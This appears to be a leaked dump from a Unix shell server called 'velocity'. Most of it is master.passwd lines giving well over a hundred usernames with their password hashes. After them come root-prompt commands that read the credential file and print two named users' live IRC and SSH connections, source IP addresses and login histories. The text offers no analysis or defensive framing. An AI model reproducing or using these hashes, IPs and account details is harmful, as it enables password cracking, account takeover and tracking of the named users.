+daali:$1$RIGXxrvu$loyclkpc.AmaZJ6z7RycD0:1044:1044::0:0:User &:/home/daali:/usr/local/bin/bash
+skit:$1$YwEZ2Gg3$Mm9v5oPJpRUj5WbHGfiYI.:1045:1045::0:0:User &:/home/skit:/usr/local/bin/bash
+l33t:$1$BuBrfoCp$YgayOH.nAWmkTT.kOi0340:1047:1047::0:0:User &:/home/l33t:/usr/local/bin/bash
+tlm:$1$8qySBjLd$UvMl1Qi37S6HzW5.fgugN.:1049:1049::0:0:User &:/home/tlm:/usr/local/bin/bash
+itzkorn:$1$WvELNoD3$FIKMODlyhN1RIxuNyM8gV0:1051:1051::0:0:User &:/home/itzkorn:/usr/local/bin/bash
+groove:$1$U.nL9FBx$mxac7bOw5AcjMobjytLqT.:1052:1052::0:0:User &:/home/groove:/usr/local/bin/bash
+en0prcv:$1$ml9.a1tV$4ysE/.CdLiEAYOtG6IzW2.:1054:1054::0:0:User &:/home/en0prcv:/usr/local/bin/bash
+poolboy:$1$A5NPQSxN$X./Geraa6C3fLjbGv2j9h.:1055:1055::0:0:User &:/home/poolboy:/usr/local/bin/bash
+bollox:$1$1CezJarC$OZn7O/jcjFQHzMxK80L0C0:1058:1058::0:0:User &:/home/bollox:/usr/local/bin/bash
+vamp:$1$OdDSbp3S$VEOws1l9o/qV0i6Y2xiHC1:1059:1059::0:0:User &:/home/vamp:/usr/local/bin/bash
+genosyde:$1$izdrjKv1$qyo9BMhEB0kCGUinWl/dr1:1060:1060::0:0:User &:/home/genosyde:/usr/local/bin/bash
+y2j:$1$bzHRbq3a$04iFxtmEVuPEXbClBbUIM.:1061:1061::0:0:User &:/home/y2j:/usr/local/bin/bash
+katsst:$1$XkKWd/C/$gu0Kf6fWZZylSX2kvZP0y/:1062:1062::0:0:User &:/home/katsst:/usr/local/bin/bash
+nexxtea:$1$qiplCuym$aOcIJrBN7.ahK8fRpc5F.1:1063:1063::0:0:User &:/home/nexxtea:/usr/local/bin/bash
+quinn:$1$WjY3BCta$pOR9R53lRcsn9uMHRj5mO.:1064:1064::0:0:User &:/home/quinn:/usr/local/bin/bash
+crash:$1$ptyaMrnL$LfpP.5IoEVl6ASBLrZ7sw0:1066:1066::0:0:User &:/home/crash:/usr/local/bin/bash
+safety:$1$IdkZ.lW5$31zeswPr/v9Gwn6qZTDt3.:1067:1067::0:0:User &:/home/safety:/usr/local/bin/bash
+crazyl:$1$b6KKD5V2$0X.DEpoT8dnAV.2tkkSSQ/:1069:1069::0:0:User &:/home/crazyl:/usr/local/bin/bash
+tarawa:$1$kogmLs28$TVHG.5aER1x3a/6fks6fv1:1071:1071::0:0:User &:/home/tarawa:/usr/local/bin/bash
+athemp:*LOCKED*$1$yNQrxvZa$ndX97oZnZ.P29pYdLUDUX1:1077:1077::0:0:User &:/home/athemp:/usr/local/bin/bash
+cazz1961:$1$tNbxmjSZ$0nG7YCqOLZZBu.rdFYNXg1:1087:1087::0:0:User &:/home/cazz1961:/usr/local/bin/bash
+vitalrbj:$1$obXp9UmW$ASCrtvpO6SSYxAtC9/BgN1:1088:1088::0:0:User &:/home/vitalrbj:/usr/local/bin/bash
+digitalman:$1$.uafD1mk$ZKCSAxQX05Bt8CR1vD0bI.:1090:1090::0:0:User &:/home/digitalman:/usr/local/bin/bash
+timgor:$1$fV/Hdpqj$2sjgaBZs6L4cWkD8coayp1:1096:1096::0:0:User &:/home/timgor:/usr/local/bin/bash
+techi3:$1$ynI1L3YX$lTwOx8CeuiBAbtCq2rXG2.:1098:1098::0:0:User &:/home/techi3:/usr/local/bin/bash
+apo:$1$lgsvmKYS$kJ/vrigrNVEXtw8V3qA3K/:1099:1099::0:0:User &:/home/apo:/usr/local/bin/bash
+blkgraz:$1$5q0v8Hnd$zACUwgVPinssVcu8I8Ouf0:1100:1100::0:0:User &:/home/blkgraz:/usr/local/bin/bash
+jamesn:$1$0ZLHnfT0$mF2GuCKO5WcYOceupFee0/:1101:1101::0:0:User &:/home/jamesn:/usr/local/bin/bash
+sacred:*LOCKED*$1$QBsL9qE8$9gAsuW0OK2OH2.UfBBD4n/:1103:1103::0:0:User &:/home/sacred:/usr/local/bin/bash
+jschultk:$1$Ghq0DYN4$XO2MmdjnPzIkQT0nWFNi.0:1104:1104::0:0:User &:/home/jschultk:/usr/local/bin/bash
+narcissu:$1$yPWcgSV9$K6b21WLz8VeolcK9x26mW1:1105:1105::0:0:User &:/home/narcissu:/usr/local/bin/bash
+neohax:$1$BYHxfesg$7Vu8ktsSVk6FGgSMczVQG.:1115:1115::0:0:User &:/home/neohax:/usr/local/bin/bash
+ceejay:*LOCKED*$1$sDhV37Ee$hKD5Ycjby19mEG3NYYIYo0:1119:1119::0:0:User &:/home/ceejay:/usr/local/bin/bash
+wolf:$1$.MGFDwFE$jy3l9ohTEH1ykRgpGM1Q6.:1126:1126::0:0:User &:/home/wolf:/usr/local/bin/bash
+warlordz:$1$uvxD1gWl$4fRmw..Z.wViXzw28Jlmu1:1129:1129::0:0:User &:/home/warlordz:/usr/local/bin/bash
+hh360:$1$BRAG0RtG$iXnTwrCohVK8HOGAJohy10:1130:1130::0:0:User &:/home/hh360:/usr/local/bin/bash
+simonbh:$1$97E2uBin$73LaITM/WELCrMAt682Z21:1133:1133::0:0:User &:/home/simonbh:/usr/local/bin/bash
+crazie:$1$myYGtQTs$U52cfuiCDyksyWJbM55dx.:1134:1134::0:0:User &:/home/crazie:/bin/tcsh
+burnt:$1$ykBWG.ZC$dfTn3m8koWfmAY1QHpx1R0:1136:1136::0:0:User &:/home/burnt:/usr/local/bin/bash
+xckx:*LOCKED*$1$7mjlMrC7$j/ZtDnWpTeAgxJl4jrPPV1:1139:1139::0:0:User &:/home/xckx:/bin/sh
+f3d0r:*LOCKED*$1$9K1FP6Bz$KDznsL2Eh9l3ljez.qoif/:1140:1140::0:0:User &:/home/f3d0r:/usr/local/bin/bash
+khicks:$1$VzHaJyrH$0m/NnKHiTrFY..8zhbaLq0:1145:1145::0:0:User &:/home/khicks:/usr/local/bin/bash
+schlomer:*LOCKED*$1$iBBpx5BZ$LjFBxe10UsUGETx8AZfiP0:1147:1147::0:0:User &:/home/schlomer:/usr/local/bin/bash
+nodex:$1$Q518nSu7$4WszHno7Bi4NymOySGq1a0:1153:1153::0:0:User &:/home/nodex:/usr/local/bin/bash
+crrj13:$1$m4PUs5Ia$3tsRV7DZyj3fLxjHK9.AX0:1155:1155::0:0:User &:/home/crrj13:/usr/local/bin/bash
+dravas:$1$hTXK1nl7$0WoSi2Md.l7h/eM2uQCp5.:1157:1157::0:0:User &:/home/dravas:/usr/local/bin/bash
+sinistro:$1$rt7kcwvQ$xe2ixfObxehOHLzoILyVF.:1170:1170::0:0:User &:/home/sinistro:/usr/local/bin/bash
+izedd:*LOCKED*$1$D5UKCjr0$e9soJXXTyUG1Xf5eHHDuZ/:1172:1172::0:0:User &:/home/izedd:/usr/local/bin/bash
+chevym4n:$1$K1uoGWl/$rZLwDgLIgr.Xni315uVpX.:1174:1174::0:0:User &:/home/chevym4n:/usr/local/bin/bash
+edgein:$1$2Vs.w9gS$mvylnKn4jxg6lsitAbz.i.:1175:1175::0:0:User &:/home/edgein:/usr/local/bin/bash
+shoes:$1$e.WxvF9e$UR5G4Q4zBbgMYaRcvKR3L/:1178:1178::0:0:User &:/home/shoes:/usr/local/bin/bash
+zenchi:$1$4YSeHXDW$0/Y40Q9iuLRgd0IJKQucc.:1179:1179::0:0:User &:/home/zenchi:/usr/local/bin/bash
+darien9:$1$vzP7ScLf$c/x7.w4a8hLqcy/cm.3uk1:1180:1180::0:0:User &:/home/darien9:/usr/local/bin/bash
+reaper90:*LOCKED*$1$RdwnqlVZ$u0yfgSk8FCTKkzDb.n3gM1:1181:1181::0:0:User &:/home/reaper90:/usr/local/bin/bash
+bnoel:$1$drKh3ET3$.V5pp0CrLCNjMiPuKJxnY1:1183:1183::0:0:User &:/home/bnoel:/usr/local/bin/bash
+hts:$1$84Ss/lv8$b51Gx1URnSeNK63ZO8kNZ1:1188:1188::0:0:User &:/home/hts:/usr/local/bin/bash
+hw4tbnc:$1$Vh3/g6US$cPnpGhNkNG9BWvCQ3t2Yz/:1190:1190::0:0:User &:/home/hw4tbnc:/usr/local/bin/bash
+xavi:$1$9xxNvzQF$drSUfEtQS.QXN1BbuSZAQ/:1192:1192::0:0:User &:/home/xavi:/usr/local/bin/bash
+kruapra:$1$Nbcjv9YC$N8ePQ6PSdQHF0U/DKkrkh0:1193:1193::0:0:User &:/home/kruapra:/usr/local/bin/bash
+bbblade1:$1$3QdkfReN$LAGYA1xhqAuhcTw0fJWsl0:1197:1197::0:0:User &:/home/bbblade1:/usr/local/bin/bash
+oby1:$1$GkQaLc30$6DXwEhSd9QSeDF5FjAVTB0:1198:1198::0:0:User &:/home/oby1:/usr/local/bin/bash
+ltootle:$1$QGrHDsUo$Wl.6N3Nm9ev1dK58x.e80/:1199:1199::0:0:User &:/home/ltootle:/usr/local/bin/bash
+zime:$1$uiS1oy.Q$WiVC7b9esN7u4IQw9qrsl0:1200:1200::0:0:User &:/home/zime:/usr/local/bin/bash
+ksafusi:$1$hEuXZPjD$AxW7YdBYaTfraRpTuLhhs.:1202:1202::0:0:User &:/home/ksafusi:/usr/local/bin/bash
+methanl:$1$DDefrWsW$uVtJKR20EYhnrGhL2lgAM0:1205:1205::0:0:User &:/home/methanl:/usr/local/bin/bash
+anux:$1$MjMKgFJP$Db/H.GWM0F4V8y6aESFx9/:1206:1206::0:0:User &:/home/anux:/usr/local/bin/bash
+tea:$1$XsdcVMWd$6zKH0gChUzxwFW9JWohhU0:1207:1207::0:0:User &:/home/tea:/usr/local/bin/bash
+ircjaymz:$1$OQn.DXif$.CQTkWt2WMacpsLiIzTFN/:1210:1210::0:0:User &:/home/ircjaymz:/usr/local/bin/bash
+coolcat:$1$Oylm8zdT$1fJ9FuOxsLixvN0Mvi7gv1:1211:1211::0:0:User &:/home/coolcat:/usr/local/bin/bash
+zeepysea:$1$3eGKEHR9$zOgqVHLQHdZVHWxVuNJZG0:1213:1213::0:0:User &:/home/zeepysea:/usr/local/bin/bash
+darkevil:$1$45g22hpl$DdFBwycNzL3o9D./PKHzf1:1214:1214::0:0:User &:/home/darkevil:/usr/local/bin/bash
+grindey:$1$.Y3kkIHc$kKp8DefYIdeekSzixAV4f0:1215:1215::0:0:User &:/home/grindey:/usr/local/bin/bash
+silver15:$1$tb0VvKDF$c0SYfPvgceRpkYvTeLE43/:1216:1216::0:0:User &:/home/silver15:/usr/local/bin/bash
+smash:$1$jNnzzwU.$p5P3qiiQdK8fh22y8pM2k.:1218:1218::0:0:User &:/home/smash:/usr/local/bin/bash
+reznik:$1$NB.AbeQB$woH82mNch0lgffXyGchAU/:1219:1219::0:0:User &:/home/reznik:/usr/local/bin/bash
+omelette:*LOCKED*$1$XN1bbL.7$oThuyRVmG09RvI02.4C1I0:1222:1222::0:0:User &:/home/omelette:/usr/local/bin/bash
+mimik0r:$1$0XSPv6Su$ZwaXxxlJYHS97/pdN0oy90:1223:1223::0:0:User &:/home/mimik0r:/usr/local/bin/bash
+owine:$1$wxGmMtzO$Z3thy5JIjzaffvKpPG9WI/:1224:1224::0:0:User &:/home/owine:/usr/local/bin/bash
+manboo:$1$N2gCSmE3$yk.dcCPMq6Y1/ezAac7wu0:1225:1225::0:0:User &:/home/manboo:/usr/local/bin/bash
+corley:$1$PvKjpEEr$Vo37apBxJ3eqZqB8OLfaT.:1231:1231::0:0:User &:/home/corley:/usr/local/bin/bash
+sqd:$1$OZvYdPVR$FmfB6RtJAzTp1oGmdMCCp1:1233:1233::0:0:User &:/home/sqd:/usr/local/bin/bash
+mooo:$1$zEP5oqSf$UbHTr1.JzIn0ey0.DAGn21:1234:1234::0:0:User &:/home/mooo:/usr/local/bin/bash
+comedy:$1$z6LpAT1A$nc1/vuEvWdaP/cLqkowCs.:1235:1235::0:0:User &:/home/comedy:/usr/local/bin/bash
+lynx:$1$se6yc6Bo$.LQ7e0Q01u3rYovysJR3h1:1236:1236::0:0:User &:/home/lynx:/usr/local/bin/bash
+prodigy:$1$RVyb9n7n$.xCux6MDqOIdqJ0st2KOb1:1237:1237::0:0:User &:/home/prodigy:/usr/local/bin/bash
+chrirc:$1$2JCsvlHc$i/CQOaTf5gEpM7oFCjDN/.:1238:1238::0:0:User &:/home/chrirc:/usr/local/bin/bash
+lyhne1:$1$Kpsj2jtT$sjUGo/h4J2FIkuoqishrw/:1242:1242::0:0:User &:/home/lyhne1:/usr/local/bin/bash
+percott1:$1$BjzcMqbu$i3/MQucqGMtCREAcP7W65.:1243:1243::0:0:User &:/home/percott1:/usr/local/bin/bash
+djspark:$1$c6xQdKTb$mWggScCvJZiwkdnzpx/Cp/:1244:1244::0:0:User &:/home/djspark:/usr/local/bin/bash
+ac1115:$1$XsglBGxw$DyTzTnNO0mOsflnamAukf0:1246:1246::0:0:User &:/home/ac1115:/usr/local/bin/bash
+asriel:$1$VbcBqSUx$JEQvA2lwRWPqk.0w11oes/:1247:1247::0:0:User &:/home/asriel:/usr/local/bin/bash
+devil:$1$q6WNzUIk$/Qv4J3E.fbG/JE4j.hHAL/:1248:1248::0:0:User &:/home/devil:/usr/local/bin/bash
+lymelyte:$1$nqTvcQub$visWqXp3cKGDkwc25KYNl0:1249:1249::0:0:User &:/home/lymelyte:/usr/local/bin/bash
+cmm:$1$ekGdXp0j$hUyJVyP3UXWhCOHVtCq/N1:1250:1250::0:0:User &:/home/cmm:/usr/local/bin/bash
+nek0o:$1$PUmJEvpa$ZrIV7QV6Qf3GJn5cEOTIu0:1252:1252::0:0:User &:/home/nek0o:/usr/local/bin/bash
+baxxta:$1$apBmnTij$hZw5VnHaUpHlSuOIYNfD20:1253:1253::0:0:User &:/home/baxxta:/usr/local/bin/bash
+bruhaha:$1$HH2GgFl4$cmXD/bE438EiLmIbJyqdR1:1254:1254::0:0:User &:/home/bruhaha:/usr/local/bin/bash
+dv327:$1$MDTcfoUl$154clLyjNZI4qgtQzyrDq/:1258:1258::0:0:User &:/home/dv327:/usr/local/bin/bash
+voxitize:$1$DWOR6B.M$ppBHJaNOS4LvRrOhbphX2/:1261:1261::0:0:User &:/home/voxitize:/usr/local/bin/bash
+own3d:$1$kCOJh8SJ$KwEe1bJ8e.JS3Nm.xwYb10:1262:1262::0:0:User &:/home/own3d:/usr/local/bin/bash
+feed:$1$RHeHyv6H$v1cnIn1fKUwC9k.got3dl.:1264:1264::0:0:User &:/home/feed:/usr/local/bin/bash
+yaquis:$1$68F1SID1$b9H5Bbj/fNYsvUhqgpr9Q1:1266:1266::0:0:User &:/home/yaquis:/usr/local/bin/bash
+bpunux:$1$SqaNE5JP$bp1vJn3I4Rr6oZ6eJAmvz0:1269:1269::0:0:User &:/home/bpunux:/usr/local/bin/bash
+skypilot:$1$0iDevIYV$Oi53AE7YFrB6AaBnAfcn7.:1271:1271::0:0:User &:/home/skypilot:/usr/local/bin/bash
+blake96:$1$KwitdaYi$2EyIIukI8gEIxZCHwwj4U.:1272:1272::0:0:User &:/home/blake96:/usr/local/bin/bash
+blotch:$1$rYr2mFcV$HPpQFgQacg4ScPjvNfYR31:1274:1274::0:0:User &:/home/blotch:/usr/local/bin/bash
+scouse:$1$du5wftbl$lVamWsT/nEKT75D/IelEI/:1275:1275::0:0:User &:/home/scouse:/usr/local/bin/bash
+mogle3:$1$Fo7FY4Sw$ioqHiMhZ/8BBDZjg39BR41:1276:1276::0:0:User &:/home/mogle3:/usr/local/bin/bash
+ste:$1$H4hxohFI$se6RPLcCpkl/LY4aUiov6.:1277:1277::0:0:User &:/home/ste:/usr/local/bin/bash
+omgwtf:$1$eK9d4q9r$eCZMCR.GRqmt6oOhrbam11:1281:1281::0:0:User &:/home/omgwtf:/usr/local/bin/bash
+brosb4:$1$NQd5q63M$62LY3LnPxuPbrBmTANOkm1:1283:1283::0:0:User &:/home/brosb4:/usr/local/bin/bash
+mindben:$1$xrm2x1nF$DnA.Wkg4q9ImdLOA75IT00:1284:1284::0:0:User &:/home/mindben:/usr/local/bin/bash
+hixk:$1$p2dRk8OC$XpC/2o0jwotue0Tmbdr3R0:1286:1286::0:0:User &:/home/hixk:/usr/local/bin/bash
+omen:$1$eT86NXcE$.ouer9/Fp/lv04NAhli5a1:1287:1287::0:0:User &:/home/omen:/usr/local/bin/bash
+sakik1:$1$PujiBsEC$Syl3nyJzAObvu2UcpfbVd/:1290:1290::0:0:User &:/home/sakik1:/usr/local/bin/bash
+chriys:$1$R0.IBcw2$VILPHOKDvQts2eyy6ndoK0:1291:1291::0:0:User &:/home/chriys:/usr/local/bin/bash
+jtracy:$1$RxPgmSPJ$/O7J8PYHUMZHIx/4hJ0XE0:1292:1292::0:0:User &:/home/jtracy:/usr/local/bin/bash
+roodyk:$1$0Bo4ZY89$ray17Ga4HpE2QtaFiHOg11:1293:1293::0:0:User &:/home/roodyk:/usr/local/bin/bash
+qfx:$1$miBfwHok$ODKoxjFkZSYxfQqzQX96A1:1295:1295::0:0:User &:/home/qfx:/usr/local/bin/bash
+chrisdad:$1$hurRNkwG$V8PUznOwFheCuU6TCWic4.:1296:1296::0:0:User &:/home/chrisdad:/usr/local/bin/bash
+rice21:$1$nB9dgK9c$XmTcPL/ig7xDxT1iIbY4..:1298:1298::0:0:User &:/home/rice21:/usr/local/bin/bash
+wchan21:$1$Ia3.DKEB$oTtcBvRdagIb59HbVfc3l0:1299:1299::0:0:User &:/home/wchan21:/usr/local/bin/bash
+xkelsx:$1$iWNCktLQ$F37FwcA8XlJuiSk0RqB1p1:1300:1300::0:0:User &:/home/xkelsx:/usr/local/bin/bash
+jerryste:$1$lUhhapJy$Hi6dQ4ToW6xAPMjfK5bBS1:1302:1302::0:0:User &:/home/jerryste:/usr/local/bin/bash
+pbx:$1$Ln.hfEBz$k/Q1E0leCS9T.gLaPPpBA.:1303:1303::0:0:User &:/home/pbx:/usr/local/bin/bash
+mlh:$1$9kndvAsu$/kIT6xRBCsb8nf8.m0kPV.:1307:1307::0:0:User &:/home/mlh:/usr/local/bin/bash
+howell1:$1$Vtbi5SB.$w6W4pZ/Pc/TfPA0y0jod4/:1308:1308::0:0:User &:/home/howell1:/usr/local/bin/bash
+djkarl:$1$aEJTRbAG$3eWTZQ4CgwGbHbAfHHl4P.:1309:1309::0:0:User &:/home/djkarl:/usr/local/bin/bash
+subkult:$1$2QPeEVKb$bCL0KYncuAGfIO4FKWW3N1:1310:1310::0:0:User &:/home/subkult:/usr/local/bin/bash
+dealer:$1$mITFxoNU$lJtxGqUo2K4rE6/PYLYCg/:1311:1311::0:0:User &:/home/dealer:/bin/sh
+cont:$1$Hl1DCBfm$HO43dbNlGn6TZvo/F2zTH0:1312:1312::0:0:User &:/home/cont:/usr/local/bin/bash
+ircusr:$1$X1181Xd3$524I5czvIWxCkduxRuKhk1:1313:1313::0:0:User &:/home/ircusr:/usr/local/bin/bash
+lordy:$1$y5CwHmRO$PZRJ/aY7BtMqY9FagatZR1:1314:1314::0:0:User &:/home/lordy:/usr/local/bin/bash
+chozen1:$1$qc4UoXsN$U/YTbetNKaZ/RwEYpWOdP1:1315:1315::0:0:User &:/home/chozen1:/usr/local/bin/bash
+nardi:$1$ttRgdp5X$kq1Gb/4FPSmGdbiYBEwt1/:1316:1316::0:0:User &:/home/nardi:/usr/local/bin/bash
+ssaws:*LOCKED*$1$.qT8FvGI$l60rRjSoGgG699wR51Ie/0:1317:1317::0:0:User &:/home/ssaws:/usr/local/bin/bash
+chaos1:$1$hgGtAmCk$BzvUVeU8f38CKZPr4CcZ/1:1318:1318::0:0:User &:/home/chaos1:/usr/local/bin/bash
+jax66:$1$4TWJjUIH$Pm/erJRmRgc01FCVakDfB.:1319:1319::0:0:User &:/home/jax66:/usr/local/bin/bash
+paleride:$1$ahPjbJV5$g63Rwng/2D9rKeK0bIwdx.:1320:1320::0:0:User &:/home/paleride:/usr/local/bin/bash
+kokoryu:$1$NVQwZzru$VjR4eW9CGrT.YF6nh72Ke0:1321:1321::0:0:User &:/home/kokoryu:/usr/local/bin/bash
+bluewish:$1$rQtdB28x$5bGykkOQ8gr5lx1qHYlRs1:1322:1322::0:0:User &:/home/bluewish:/usr/local/bin/bash
+grumpy:$1$o.biiCj3$5AG9SpDJjbNUSSnnJ92uc.:1323:1323::0:0:User &:/home/grumpy:/usr/local/bin/bash
+jaiven:$1$y.IDqqL3$u7netp1tGxbhjKfbd6XTO0:1324:1324::0:0:jusam69:/home/jaiven:/usr/local/bin/bash
+rikt:$1$Fjry.jO8$9hNprEmsN9GLULLeZvb.o1:1325:1325::0:0:User &:/home/rikt:/usr/local/bin/bash
+sal:$1$AuSJnmDL$YSdEP0KfVzRRVCiyhnnhj.:1326:1326::0:0:User &:/home/sal:/usr/local/bin/bash
+lailoke:$1$EC6X0Zz.$DdVRj0ju8ua4DKMFCAFUo/:1327:1327::0:0:User &:/home/lailoke:/usr/local/bin/bash
+kingzy:$1$qm46wwsJ$QNk/qT5dDS2bXr87qZpMi0:1328:1328::0:0:User &:/home/kingzy:/usr/local/bin/bash
+delion1:$1$awK8R.nN$0GCL5dcuK1cirjfudAqHY0:1329:1329::0:0:User &:/home/delion1:/usr/local/bin/bash
+vietnigh:$1$FdwjedVt$tmUPUlfiHYr/bTUivlFn01:1330:1330::0:0:User &:/home/vietnigh:/usr/local/bin/bash
+darkuno3:$1$L9VYcl3k$mIQ9ahiFi0Sy0Oc8re8TM0:1331:1331::0:0:User &:/home/darkuno3:/usr/local/bin/bash
+mae21:$1$aVUu0DTg$jvYomCsK1cewfLWHurOlv0:1332:1332::0:0:User &:/home/mae21:/usr/local/bin/bash
+redrum:$1$WFOWXv8b$Rqxxha5.d8WjszhU0AKXC.:1333:1333::0:0:User &:/home/redrum:/usr/local/bin/bash
+cpu:$1$tjEDjNz1$e6.aktoZ6oizYft1eyXMp.:1334:1334::0:0:User &:/home/cpu:/usr/local/bin/bash
+cassand:$1$hZgXLQbv$uE7b8oM88z9qjqhFwka7X/:1335:1335::0:0:User &:/home/cassand:/usr/local/bin/bash
+nyakz:$1$yGPbLpHT$cIcqvBVPmI6fjG9cilKu7/:1336:1336::0:0:User &:/home/nyakz:/usr/local/bin/bash
+ioplex:$1$FSJ1qmmR$zFt5TGcDNeAQOcWCiWQZq0:1337:1337::0:0:User &:/home/ioplex:/usr/local/bin/bash
+dasboot:$1$PgS728fU$IfecoKOgPjuVFep1GIesx.:1338:1338::0:0:User &:/home/dasboot:/usr/local/bin/bash
+visage:$1$jGAd8QtY$Fi4fFEemJYjj0/gu9oDDc1:1339:1339::0:0:User &:/home/visage:/usr/local/bin/bash
+brosco:$1$kpHOwub.$2odvLK5iEXASTkwbcuilY0:1340:1340::0:0:User &:/home/brosco:/usr/local/bin/bash
+mrts:$1$f8026tqY$cxdY57bGxA11PdflJBaET/:1341:1341::0:0:User &:/home/mrts:/usr/local/bin/bash
+qberto:$1$qprEj3J4$VzXPUlgGqiKKlZIml3M8y/:1342:1342::0:0:User &:/home/qberto:/usr/local/bin/bash
+kooner:$1$Kl19GSGx$ZjpFwBynWbIT40iEkCfxg/:1343:1343::0:0:User &:/home/kooner:/usr/local/bin/bash
+matt:$1$Mj6LerXV$SnwLvGTJI5hQbZLi7ho96/:1344:1344::0:0:User &:/home/matt:/usr/local/bin/bash
+alexbb:$1$6LLUjutX$OiYpyvVAi60xC2sFVA4OP0:1345:1345::0:0:User &:/home/alexbb:/usr/local/bin/bash
+psycoz:$1$UgwFHV0f$4/V6NqEuYTJL2GwpfwjYb.:1346:1346::0:0:User &:/home/psycoz:/usr/local/bin/bash
+brex132:$1$lhno75FQ$L5fsLgcdEObDqCp55rkQn/:1347:1347::0:0:User &:/home/brex132:/usr/local/bin/bash
+romeo:$1$ekIx6D6b$coKlSvt01Xe8jfDaK7e5A1:1348:1348::0:0:User &:/home/romeo:/usr/local/bin/bash
+pimpinjg:$1$6gpJ9Bk3$/lYnWkgoGwYBXOIR4ff581:1349:1349::0:0:pimp:/home/pimpinjg:/usr/local/bin/bash
+[root@velocity:/var/run]# 
+
+[root@velocity:/]# cat /etc/master.passwd | grep romeo
+romeo:$1$ekIx6D6b$coKlSvt01Xe8jfDaK7e5A1:1348:1348::0:0:User &:/home/romeo:/usr/local/bin/bash
+[root@velocity:/]# cat /etc/master.passwd | grep pimpinjg
+pimpinjg:$1$6gpJ9Bk3$/lYnWkgoGwYBXOIR4ff581:1349:1349::0:0:pimp:/home/pimpinjg:/usr/local/bin/bash
+
+
+[root@velocity:/]# lsof -i -n | grep romeo
+irssi     32525      romeo    3u  IPv4 0xcc67d000      0t0  TCP 72.20.28.205:53881->71.6.199.68:ircd (ESTABLISHED)
+irssi     32525      romeo    4u  IPv4 0xc9254740      0t0  TCP 72.20.28.205:53882->66.225.223.70:ircd (ESTABLISHED)
+irssi     32525      romeo    5u  IPv4 0xc9c76cb0      0t0  TCP 72.20.28.205:53883->94.102.58.212:ircd (ESTABLISHED)
+irssi     32525      romeo   20u  IPv4 0xc5bf1ae0      0t0  TCP 72.20.28.205:54464->67.203.77.67:ircd (ESTABLISHED)
+sshd      83595      romeo    3u  IPv4 0xc58a23a0      0t0  TCP 72.20.28.248:ssh->188.50.41.73:56764 (ESTABLISHED)
+[root@velocity:/]# lsof -i -n | grep pimpinjg
+sshd      82325   pimpinjg    3u  IPv4 0xc5480000      0t0  TCP 72.20.28.248:ssh->76.175.20.182:55028 (ESTABLISHED)
+
+
+[root@velocity:~]# last
+katsst           ttyp2    adsl-76-240-177- Tue Jun 23 18:34 - 19:04  (00:30)
+katsst           ttyp2    adsl-76-240-177- Tue Jun 23 18:13 - 18:33  (00:20)
+katsst           ttyp2    adsl-76-240-177- Tue Jun 23 17:13 - 17:43  (00:30)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 08:51 - 08:51  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:47   still logged in
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 08:37 - 08:42  (00:05)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:37 - 08:43  (00:06)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36  (00:00)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 07:19 - 08:32  (01:12)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:15 - 08:36  (01:20)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:12 - 07:13  (00:01)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:11 - 07:12  (00:00)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 05:20 - 05:20  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 04:59 - 07:10  (02:10)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 03:43 - 04:25  (00:42)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 03:10 - 03:10  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 02:52 - 02:59  (00:07)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 02:37 - 02:38  (00:01)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:26 - 01:28  (00:01)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:16 - 01:17  (00:01)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 01:15 - 01:43  (00:28)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:11 - 01:14  (00:02)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:02 - 01:07  (00:04)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 00:45 - 01:14  (00:28)
+alexbb           ttypd    53551eb9.cable.c Tue Jun 23 00:29 - 00:29  (00:00)
+katsst           ttypf    cpe-75-84-149-5. Mon Jun 22 23:35 - 00:05  (00:30)
+katsst           ttypd    cpe-75-84-149-5. Mon Jun 22 23:15 - 23:35  (00:19)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 21:14 - 22:05  (00:50)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 21:07 - 21:14  (00:07)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 19:23 - 19:54  (00:31)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 18:36 - 18:36  (00:00)
+blkgraz          ttypf    cpe-66-25-54-163 Mon Jun 22 17:41 - 23:35  (05:53)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 17:40 - 18:24  (00:43)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 17:12 - 17:37  (00:24)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 09:20 - 09:21  (00:01)
+pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:45 - 09:19  (00:33)
+pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:37 - 08:40  (00:02)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:30 - 08:49  (00:19)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:20 - 08:26  (00:05)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:17 - 08:18  (00:01)
+pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:03 - 08:12  (00:08)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:01 - 08:03  (00:02)
